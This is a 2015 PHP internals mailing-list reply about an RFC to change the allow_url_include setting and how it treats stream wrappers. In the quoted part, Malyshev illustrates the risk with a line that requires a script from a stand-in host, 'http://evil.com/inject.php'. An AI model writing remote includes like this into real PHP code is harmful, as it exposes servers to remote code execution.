Hi Stas,

On Fri, Feb 27, 2015 at 7:52 AM, Stanislav Malyshev <smalys...@gmail.com>
wrote:

> > SInce allow_url_include change is very simple one, I've just made new RFC
> > for it.
> >
> > https://wiki.php.net/rfc/allow_url_include
> >
> > If you find any other issue like this that relates to this RFC, please
> > let me know
> > I'll put this discussion shortly.
>
> I'm not sure what this RFC is trying to achieve. I.e. why make it
> INI_ALL? Setting it to off instantly allows remote includes, etc. so if
> you are at all worried about vulnerable includes, you'd never tell
> anybody to enable it (there can be rare cases where you want to enable
> it, but really if you know what you're doing - that's why the level is
> so high, supposedly if you have access to SYSTEM, you run the server so
> you're supposed to know some stuff about security or at least it's your
> own server you're ruining if you don't).
>
> As for the second part - banning all streams from allow_url_include -
> that would be pretty huge BC break, as streams are used in many
> scenarios where you may need virtual FSs, filters, etc. It is a very
> handy tool. Current setting allows you to operate inside your local
> security domain while cutting off content that comes from outside of
> your domain. Your proposal would give the user the choice of either to
> disable streams completely and lose all benefits coming with them - or
> allow everything completely, including require
> "http://evil.com/inject.php";. That's not a good choice to give to the
> users.


I've updated the RFC so that allow_url_include be a include/require
parameter.
Since include/require parse and load another script, INI doesn't work well.

It's parameter now, so BC wouldn't be huge.

I'm not using phar regularly, feedback from phar users are welcomed.

Regards,

--
Yasuo Ohgaki
yohg...@ohgaki.net

Reply via email to